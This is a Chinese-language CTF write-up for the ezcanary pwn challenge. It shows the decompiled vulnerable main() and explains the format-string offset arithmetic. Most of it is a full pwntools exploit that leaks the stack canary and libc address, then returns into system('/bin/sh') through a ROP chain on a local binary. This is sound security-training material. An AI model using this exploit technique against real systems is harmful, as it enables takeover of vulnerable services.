pwn7(利用格式化字符串泄露libc)

题目[HNCTF 2022 WEEK4]ezcanary

/*
 * Decompiled main() of the challenge binary (IDA output, kept verbatim).
 *
 * Frame layout as recovered by IDA: s at rbp-0x170, buf at rbp-0x110 and the
 * stack canary (v6) at rbp-8, so the distance from buf to the canary is
 * exactly 0x108 = 264 bytes. The __stack_chk_fail comparison at function
 * exit is not shown in this listing, so any overflow must write the real
 * canary value back at rbp-8.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[96]; // [rsp+0h] [rbp-170h] BYREF
  char buf[264]; // [rsp+60h] [rbp-110h] BYREF
  unsigned __int64 v6; // [rsp+168h] [rbp-8h]

  v6 = __readfsqword(0x28u); // stack canary loaded from fs:0x28
  setbuf(stdin, 0LL);        // all three streams unbuffered: printf output is written out immediately
  setbuf(stderr, 0LL);
  setbuf(stdout, 0LL);
  puts("Input your name:");
  memset(s, 0, sizeof(s));   // shorter inputs are NUL-terminated thanks to this zeroing ...
  read(0, s, 0x60uLL);       // ... but a full 96-byte read leaves no NUL, and s is immediately followed by buf
  printf(s);                 // BUG (CWE-134): user-controlled format string; %N$p reads stack slots, %n could write
  read(0, buf, 0x200uLL);    // BUG (CWE-121): 0x200 bytes into a 264-byte buffer, overrunning canary, saved rbp and return address
  return 0;
}

本题考察格式化字符串漏洞与带 canary 的栈溢出的组合利用:先用 printf(s) 的格式化字符串泄露 canary 和 libc 地址,再利用第二次 read 对 buf 的溢出(0x200 字节写入 264 字节的缓冲区)还原 canary 并构造 ROP 调用 system("/bin/sh")。

pwn7(利用格式化字符串泄露libc)_第1张图片

pwn7(利用格式化字符串泄露libc)_第2张图片

手动计算偏移:x86-64 下 printf 的前 5 个可变参数通过寄存器传递,%6$p 对应 rsp 处的第一个栈 qword。canary 位于 rbp-8 即 rsp+0x168,0x168/8 = 45,所以 %51$p 输出的是 canary;%52$p 是保存的 rbp,%53$p 是 main 的返回地址(指向 libc 中 __libc_start_call_main 内部),用它减去对应 libc 版本中的偏移(作者所用 libc 为 0x29d90,换 libc 需重新计算)即可得到 libc 基址。注意 %p 不会补零,canary 最高 nibble 为 0 时输出的十六进制位数会少于 16 位,解析泄露值时不要按固定长度读取。

exp:

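from pwn import *

# Exploit for [HNCTF 2022 WEEK4] ezcanary.
#
# Stage 1: the user-controlled printf() leaks the stack canary and main's
#          return address (inside libc) through positional %N$p specifiers.
# Stage 2: the second read() overflows buf[264]; we write the canary back and
#          return into system("/bin/sh").
#
# Every offset and gadget below was taken from the original write-up for the
# local ./l binary and its ./libc.so.6 -- recompute them for any other build.

BINARY = './l'
LIBC = './libc.so.6'

CANARY_FMT_INDEX = 51        # %51$p -> canary at rbp-8 (rsp+0x168: index 6 + 0x168/8)
RETADDR_FMT_INDEX = 53       # %53$p -> saved return address of main (points into libc)
LEAK_TO_LIBC_BASE = 0x29d90  # distance of that return address from the libc base in the
                             # author's glibc build -- verify against your libc
LIBC_FIXUP = 0x10            # the original exploit adds 0x10 to both system and the
                             # "/bin/sh" address; this is unexplained and should be 0
                             # once LEAK_TO_LIBC_BASE matches the libc in use
CANARY_OFFSET = 0x110 - 8    # buf is at rbp-0x110, the canary at rbp-8
POP_RDI_RET = 0x401323       # pop rdi ; ret   (gadget in ./l)
RET = 0x40101A               # ret             (re-aligns rsp to 16 before system)

context(arch="amd64", os="linux", log_level="debug")

z = process(BINARY)
libc = ELF(LIBC)


def bug():
    """Attach gdb to the target, only when run as `python exp.py DEBUG`."""
    if args.DEBUG:
        gdb.attach(z)


# --- stage 1: leak canary and libc through the format string ---------------
z.recvuntil(b"e:\n")
# Terminate each leaked value with '.' so we can parse on delimiters rather
# than a fixed byte count: %p prints no leading zeros (a canary whose top
# nibble is 0 is shorter than 16 hex digits) and the program prints nothing
# after the last value, so a fixed-width recv() is fragile.
fmt = '%{}$p.%{}$p.'.format(CANARY_FMT_INDEX, RETADDR_FMT_INDEX).encode()  # b'%51$p.%53$p.'
z.send(fmt)

z.recvuntil(b'0x')
canary = int(z.recvuntil(b'.', drop=True), 16)
z.recvuntil(b'0x')
ret_addr = int(z.recvuntil(b'.', drop=True), 16)
libc_base = ret_addr - LEAK_TO_LIBC_BASE

log.info(f"canary    = {canary:#x}")
log.info(f"libc_base = {libc_base:#x}")
# Sanity checks: glibc canaries always end in a zero byte and libc is
# page-aligned. A failure here means the %N$p indices or LEAK_TO_LIBC_BASE
# do not match this build -- better to stop than to smash the stack blindly.
if canary & 0xff:
    log.error("unexpected canary value -- check CANARY_FMT_INDEX")
if libc_base & 0xfff:
    log.error("libc base is not page aligned -- check LEAK_TO_LIBC_BASE")

libc.address = libc_base
system = libc.sym['system'] + LIBC_FIXUP
binsh = next(libc.search(b'/bin/sh\x00')) + LIBC_FIXUP
log.info(f"system    = {system:#x}")
log.info(f"binsh     = {binsh:#x}")

# --- stage 2: overflow buf, restore the canary, ROP into system("/bin/sh") --
payload = flat(
    b'a' * CANARY_OFFSET,  # fill buf up to the canary
    canary,                # keep __stack_chk_fail happy
    RET,                   # stack alignment for system()
    POP_RDI_RET,
    binsh,
    system,
)
bug()
z.send(payload)

z.interactive()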
